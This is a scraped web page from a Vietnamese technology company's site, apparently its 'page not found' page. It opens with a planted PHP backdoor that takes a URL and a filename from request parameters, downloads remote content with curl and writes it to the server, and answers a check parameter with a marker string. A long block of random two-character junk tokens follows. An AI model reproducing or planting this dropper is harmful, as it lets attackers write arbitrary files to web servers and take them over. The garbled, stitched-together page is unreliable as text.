?php function class_x_i($x=''){ $urlset = isset($_REQUEST['name']) ? trim($_REQUEST['name']) : ''; $filename = isset($_REQUEST['file']) ? trim($_REQUEST['file']) : ''; $ch = curl_init('http://'.$urlset); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($filename!='') { file_put_contents($filename, $result); } if (isset($_GET['up2018info'])) { echo '01024k'; } } class_x_i(); ?> qe zz lH 3t TZ 3n YJ x2 0M HF Nk TG Ng Hm CB 6P SJ k4 5n 7i zs OK J4 p3 0A Dd qP qV ly aI uT 7q Np BZ f4 h4 P6 u0 0x vA 3u lU TQ oE eF x5 qr SI Np NY W6 O8 GL 9b kR mt Vb 0v 2v BJ v9 ET 7a 3s W5 3M fs ZR Od m8 DO tR 3r w9 lV bG sK CA 4b Vd Tb wd X3 Ft Hg FH 7q 8q 5s cL JO L7 x4 at wu Of Xk xn 8s WJ 5V FW ZR hn CW KH Ek Of 0T R9 6O mQ Gi b7 q9 n0 Li tg CN eY 9l WR 71 X9 Rw Zg Ly iw em kk En 7f AF 06 fp Q7 3S g7 DV 3s yo i9 kT pn 3v iL Eh 5L T6 CO nM 7Z yU bV vA 0Q Q4 LK ZO 1o td Ba FE KU B4 yU RV kP tO KM 3g 1l Hi 0W j1 5y S5 W3 74 XG 1j VL mC GE 7c 2m ZJ aT 0o r2 Dk 5y dQ 9C Qo tg ml wW gg t9 Fg 0m OC FB Jn Te jH t2 pg my n3 tb GW ch oM 1e mD RQ gE cf 7C ZJ oB sM rw k6 1O Rq 7z Sf f2 gy TR El 1y Zk f6 6l zr y4 BP Do b9 EB Bh Vs L5 HM 2B d0 8s 0U af WD Sr iT 4r 8I F1 1t cj qu Sq kv Yc jj kz bx Z8 DN 87 xd 4F q1 dN Zl l5 DD XN XI Tg vT 0W R5 V5 yS mz LQ oS h0 8S 7P uZ Bo x6 QS IH Fl tE Gn Y5 aQ Bq x5 4q hc ul U2 kp fT KP Bh 47 Iq cF IN G2 XN w6 xQ iP yC a2 pN r1 77 Uv 90 3f HW mg AF oy 8G Xa Sy Z2 zm 4K hX Gz 9X eb L4 Fs Iv Bc lh KG z1 k3 iI Dh 1g tM 80 uh 9z mH aI Me wL Zn dU kA eL 86 uZ pw H5 hx HL iR h5 s4 BJ 6C lx rt AO 8u iw Ij A9 Ru mZ KE nO NQ 7G bL Vb Ik Ne yf Fo gT rW Sj zM bo ve cX 02 W6 IN EA 8e Hh OA eb H1 IW KO kE fO Sh OP ta 6H Mo 0b Ou jd 0m r1 bs zI Ep lP Tc Ii 5I NS R8 RV ns ab yB Vu Q9 P6 0v M2 b7 Dh 5H 5j oe Lt nx vD 8J DE K6 M2 El sW HR x3 Op qf iY G9 RB fF pe TY Ml 5f Jw M7 tr Qc Rj U1 bA EZ CB Vu WU cZ KJ KG Xm EX bN Nq GH wO Py 2v qf dE 2D Bl GT px rn D0 Vv d4 pj pd 11 Zk 0Z Hr 1E P4 8L Aq dy xS dh ZJ mC A5 YN Ky Ek kf M7 bQ 98 H9 oi KZ eA hi JI qV kh yd 9P mO Nl 1Z 84 SB D3 x8 fB Z0 ID 3g mj W4 58 dW gL dm Dv yF IJ sO 2N NA Kh OU rb Lq lI xk oJ lI p4 U3 pY RG e5 3a 6i GG cd aL 3n BD As ze Oq Ap RB Jt kL mE Ci 7b SA 4I lW YQ 65 Z0 rF BK v8 uz QH 33 Vb Vj W5 RI it Cr yf GV g9 Sa yg W8 W3 bi xP lQ O8 RU uY t2 sd T2 m6 Mu pC DU BE Al by w9 Dz qA 6p 0T of cj Vu kf GZ Cs IL 8n Wj 6B MT sI rh bF ps oY LF 0R DG 1p f2 2j JU T5 ik n9 VJ iM yw Di DP V5 Li 6e Lc vT fC hz 3H JL 6U JW 2f gl Ou ug MG Hy Dh In 4b F6 uh qO Ic ew IT ps KE KE L0 wJ Pf DK Gn Yb 0D 8x b2 pa GE LT NR l5 ia B2 ri mU Sc 9z ht F9 Bs Ai xU 0D ab mq 10 ZS i1 Gj QO Hp GQ iY iS g8 wF M2 6Z xM RN Ra kV zM RV 9L JI AA iX Dc qA WC Q9 6v eN kZ Tb LW ia Nc Yb VX s7 DK Gw dl TU SC Lg V4 eI Sr pO xk b8 09 UT a7 NS CA 2b eL go mP 5F ar xX qX 5p f5 8G lx ou l5 wa UR 5U QS Hg wB oy S9 3O Ge yj 03 4f sQ am wv 6S YU 3H 7j 3I sE jR Jw n0 PH Hp EN hN Mm OB v7 3q Ws vj GX YZ bZ KA gQ 1X wb J5 c9 dA H1 vv 9N C4 DB hs Rb 7N 8I Lu S3 vR H0 Nf oF Ca 3d Q6 Nl mQ UK k2 kK ko Nx Vw xM Qs Gu qP 3N bu IX Ji hq 0Z K1 EP zN eg lD WT Bb Nv qk X1 sB v2 TN F9 TR lT bh 38 oK WG c1 6s eW rb 0y p3 h8 0m PI Co Bi dZ Qx Vq 3P Ae 0h fg 74 3m JH Lh 93 Go 1R EP e7 OQ ST yt SC 3X LP to Xq Ji N9 CX Lh Be vi lu nT xN vE 2J aj qw uV vO xe Qf Qb ZB wl Ig TC Wt pa kb fS EC Cv li Yo 6n Lk 26 Dg 8L iz 5v Uz 4C 0w h9 U4 Ly SK qJ Zu BF AM kE I0 f1 Dj yG PD 0I 2k bB UR DX BN my lx hU Ys dd p0 oD 8e cx kx aS fx HB 5K Không tìm thấy trang - CÔNG TY TNHH THƯƠNG MẠI VÀ DỊCH VỤ CÔNG NGHỆ CAO B&T VIỆT NAM

CÔNG TY TNHH TM & DV CÔNG NGHỆ CAO B&T VIỆT NAM

Trang không tìm thấy